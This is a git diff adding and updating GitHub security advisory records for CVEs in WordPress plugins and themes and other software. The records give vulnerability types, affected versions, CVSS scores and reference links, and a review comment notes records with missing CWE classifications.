diff --git a/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json b/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json
new file mode 100644
index 0000000000000..b268fc9cad612
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pm69-54qr-cgv7",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22346"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in A WP Life Slider Responsive Slideshow – Image slider, Gallery slideshow slider-responsive-slideshow allows Object Injection.This issue affects Slider Responsive Slideshow – Image slider, Gallery slideshow: from n/a through <= 1.5.4.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22346"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/slider-responsive-slideshow/vulnerability/wordpress-slider-responsive-slideshow-image-slider-gallery-slideshow-plugin-1-5-4-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:33Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json
new file mode 100644
index 0000000000000..61cca68f9347e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pmgj-wpmq-6xx5",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-24955"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Whizz Plugins whizz-plugins allows Reflected XSS.This issue affects Whizz Plugins: from n/a through <= 1.9.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24955"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/whizz-plugins/vulnerability/wordpress-whizz-plugins-plugin-1-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:39Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json
new file mode 100644
index 0000000000000..e7cfd796fb0c4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pq2q-m7vr-7342",
+ "modified": "2026-02-20T18:31:37Z",
+ "published": "2026-02-20T18:31:37Z",
+ "aliases": [
+ "CVE-2025-69391"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Diamond diamond allows Reflected XSS.This issue affects Diamond: from n/a through <= 2.4.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69391"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/diamond/vulnerability/wordpress-diamond-theme-2-4-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:24Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json b/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json
new file mode 100644
index 0000000000000..bb633a6907ac6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pq9c-2qch-jgmw",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2025-69405"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in ThemeREX Lorem Ipsum | Books & Media Store lorem-ipsum-books-media-store allows Object Injection.This issue affects Lorem Ipsum | Books & Media Store: from n/a through <= 1.2.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69405"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/lorem-ipsum-books-media-store/vulnerability/wordpress-lorem-ipsum-books-media-store-theme-1-2-6-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:26Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json b/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json
new file mode 100644
index 0000000000000..14e3738dff4bc
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-prpx-gw6q-vpv2",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2024-51915"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through <= 6.5.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51915"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/litespeed-cache/vulnerability/wordpress-litespeed-cache-plugin-6-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json b/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json
new file mode 100644
index 0000000000000..d06810af22929
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pw6c-r98f-r37w",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67997"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Travelicious travelicious allows Object Injection.This issue affects Travelicious: from n/a through < 1.6.7.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67997"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/travelicious/vulnerability/wordpress-travelicious-theme-1-6-7-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json
index 2a07450d4e15f..2c482be3f30ab 100644
--- a/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json
+++ b/advisories/unreviewed/2026/02/GHSA-px76-q5p2-wfgw/GHSA-px76-q5p2-wfgw.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-px76-q5p2-wfgw",
- "modified": "2026-02-19T18:31:53Z",
+ "modified": "2026-02-20T18:31:28Z",
 "published": "2026-02-19T18:31:53Z",
 "aliases": [
 "CVE-2026-27057"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Filter Everything penci-filter-everything allows Stored XSS.This issue affects Penci Filter Everything: from n/a through <= 1.7.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:26Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json b/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json
new file mode 100644
index 0000000000000..554cf7a287241
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pxxq-rvgm-p9rp",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69308"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Nestbyte Core nestbyte-core allows Blind SQL Injection.This issue affects Nestbyte Core: from n/a through <= 1.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69308"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/nestbyte-core/vulnerability/wordpress-nestbyte-core-plugin-1-2-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json b/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json
new file mode 100644
index 0000000000000..7546a6fac5b53
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q2ch-643m-222m",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:40Z",
+ "aliases": [
+ "CVE-2026-2333"
+ ],
+ "details": "Improper Neutralization of Special Elements used in a Command ('Command Injection') in Owl opds 2.2.0.4 allows Command Injection via a crafted network request.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2333"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-2333"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json
index 76c4dd18a5568..07bc403cd3f0c 100644
--- a/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json
+++ b/advisories/unreviewed/2026/02/GHSA-q2q8-xrr4-fqjh/GHSA-q2q8-xrr4-fqjh.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q2q8-xrr4-fqjh",
- "modified": "2026-02-19T18:31:53Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:53Z",
 "aliases": [
 "CVE-2026-27059"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Recipe penci-recipe allows DOM-Based XSS.This issue affects Penci Recipe: from n/a through <= 4.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:27Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json b/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json
new file mode 100644
index 0000000000000..4a931a9eea668
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q577-6r28-hw22",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69337"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in don-themes Wolmart Core wolmart-core allows Blind SQL Injection.This issue affects Wolmart Core: from n/a through <= 1.9.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69337"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wolmart-core/vulnerability/wordpress-wolmart-core-plugin-1-9-6-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json b/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json
new file mode 100644
index 0000000000000..8694d16cec456
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q682-57gm-p99w", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67994" + ], + "details": "Missing Authorization vulnerability in YayCommerce YayCurrency yaycurrency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YayCurrency: from n/a through <= 3.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67994" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/yaycurrency/vulnerability/wordpress-yaycurrency-plugin-3-3-arbitrary-content-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json b/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json new file mode 100644 index 0000000000000..1404ef75d3f44 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6xg-x4rx-4p97", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68543" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Diza diza allows PHP Local File Inclusion.This issue affects Diza: from n/a through <= 1.3.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68543" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/diza/vulnerability/wordpress-diza-theme-1-3-15-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json index 02d5d01f65136..712d15e9fdcbd 100644 --- a/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json +++ b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q8m6-hjhf-m246", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-20T18:31:32Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2026-27343" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in VanKarWai Airtifact airtifact allows PHP Local File Inclusion.This issue affects Airtifact: from n/a through <= 1.2.91.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:32Z" diff --git a/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json new file mode 100644 index 0000000000000..692cea57e14ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8wg-gw6g-8c93", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2025-70833" + ], + "details": "An Authentication Bypass vulnerability in Smanga 3.2.7 allows an unauthenticated attacker to reset the password of any user (including the administrator) and fully takeover the account by manipulating POST parameters. The issue stems from insecure permission validation in check-power.php.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70833" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve/issues/4" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json index 8b16527cca469..8b9223e1a7b48 100644 --- a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json +++ b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, 
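Review bot: In the new GHSA-q8wg-gw6g-8c93 record, `"cwe_ids": []` is empty even though `details` describes an authentication bypass caused by insecure permission validation, so a triage or alerting rule that filters on CWE will not match it. The new GHSA-rp93-gq4p-8r62 record later in this patch has the same gap: its `details` names Cross Site Scripting, and the other XSS records in this sync carry `"cwe_ids": ["CWE-79"]`. If the upstream source has not assigned a CWE yet, consumers should read an empty list as "unclassified" rather than "no weakness". Until the field is filled in, match these two records on the CVE alias or on `details`.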
diff --git a/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json b/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json new file mode 100644 index 0000000000000..f57ffd28acb36 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq6w-x794-mfrc", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69377" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Path Traversal.This issue affects User Extra Fields: from n/a through <= 17.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69377" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-17-0-arbitrary-file-deletion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json new file mode 100644 index 0000000000000..2a3fa7b421b2c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqj5-wp73-78fr", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69393" + ], + "details": "Missing Authorization vulnerability in Jthemes Exzo exzo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Exzo: from n/a through <= 1.2.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69393" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/exzo/vulnerability/wordpress-exzo-theme-1-2-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json b/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json new file mode 100644 index 0000000000000..01a9f5ad82d64 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qv9f-wvw4-25rj", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22371" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Gustavo gustavo allows PHP Local File Inclusion.This issue affects Gustavo: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22371" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/gustavo/vulnerability/wordpress-gustavo-theme-1-2-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json b/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json new file mode 100644 index 0000000000000..e4fb96b475bdb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvpj-hxx2-jj7g", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53217" + ], + "details": "Missing Authorization vulnerability in staviravn AIO WP Builder all-in-one-wp-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AIO WP Builder: from n/a through <= 2.0.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53217" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/all-in-one-wp-builder/vulnerability/wordpress-aio-wp-builder-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json b/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json new file mode 100644 index 0000000000000..07b6e5396aba9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json 
